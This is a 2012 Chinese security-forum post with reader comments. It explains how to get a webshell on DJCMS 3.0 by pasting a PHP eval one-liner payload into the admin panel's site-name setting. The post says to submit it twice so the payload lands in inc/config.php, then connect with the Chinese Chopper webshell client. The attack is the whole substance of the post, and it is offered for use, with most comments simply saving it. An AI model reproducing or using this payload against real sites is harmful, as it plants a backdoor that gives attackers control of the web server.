DJCMS 3.0后台拿shell

2012-09-13 14:51:11 11 1943 3068

进入后台在其它设置里网站名称插入以下一句话

记住提交两次

");eval($_POST[cmd])?>

然后用菜刀连接

http://www.u.com/inc/config.php

by:xch40

类别 Web安全

关于作者

194323篇文章327篇回复

评论11次

要评论？请先登录或注册

11楼

善良的拖鞋
2012-10-26 11:44

观摩一下

回复|@ta|踩(0)|顶(0)
10楼

p34ch
2012-10-26 10:21

本地测试后，后台程序就乱码了。。继续看看哪里的过滤问题。

回复|@ta|踩(0)|顶(0)
9楼

低调
2012-10-19 11:29

mark！！

回复|@ta|踩(0)|顶(0)
8楼

星天
2012-10-17 15:46

好吧我表示我的两个站都是djcms

回复|@ta|踩(0)|顶(0)
7楼

xiaobai
2012-9-14 21:12

收下了

回复|@ta|踩(0)|顶(0)
6楼

0gussi
2012-9-14 13:20

- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2012-9-13 21:15

收下、、、、、

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-13 19:54

这算是提交参数的时候没有进行过滤的漏洞吗？

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2012-9-13 19:00

和DZ很类似

回复|@ta|踩(0)|顶(0)
2楼

妖妖灵
2012-9-13 18:36

强烈支持原创

回复|@ta|踩(0)|顶(0)
1楼

istice
2012-9-13 17:40

1943 神秘小强本人？

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯法国家具连锁公司遭受网络攻击 900万客户数据“可能被盗”

法媒报道，法国家具品牌 Conforama 成为网络攻击的受害者，可能 ...

2025-02-06 17:41:46 6 3672

安全资讯人工智能模型DeepSeek R1 存在安全漏洞

DeepSeek R1 是中国最新推出的人工智能模型，正在科技界掀起波澜 ...

2025-01-30 05:52:05 12 6420

安全资讯FUNSTAT - Telegram有人索引了大量用户的公开信息并做成bot可供所有人查询

用自己的号测试了下，收集的信息非常全面，包括了你的用户名变更 ...

2025-03-25 08:17:56 32 2765

安全资讯Telegram炸了被抓了560亿条聊天记录涉及8.6亿名用户

即时通讯平台 Telegram 日前出现名为 Funstatgrtbot 的机器人， ...

2025-03-27 15:54:58 13 2206

安全资讯调查显示甲骨文云服务器确实被攻击并泄露数据但甲骨文始终没有承认

早前名为 rose87168 的黑客发帖称在 2025 年 2 月份入侵 Oracle ...

2025-03-31 17:08:33 7 1327

精华推荐

渗透测试渗透测试某大型公司局域网

闲来无事，所以就想着搞搞自己单位的内网玩玩，过程分几大篇章1 ...

2014-10-27 14:20:47 92 24177

渗透测试redis未授权访问个人总结

## 前言:刚好在整理未授权系列的洞,就学习了一波关于redis的,如 ...

2020-01-07 17:28:43 54 3122

渗透测试WebShell系列(一)---XML

想来想去还是归结成一个系列吧，虽然说在现在各种讲究高大上的时 ...

2015-04-23 00:46:13 61 17368

渗透测试Bypass 护卫神SQL注入防御（多姿势）

###0x00 前言护卫神一直专注服务器安全领域，其中有一款产品 ...

2018-06-02 11:44:04 25 30907

渗透测试Tomcat内存马学习

## 前言文章字数有点多，由于是md记录的，所以这里以MarkDown格 ...

2025-01-21 16:53:34 22 1635

Top ↑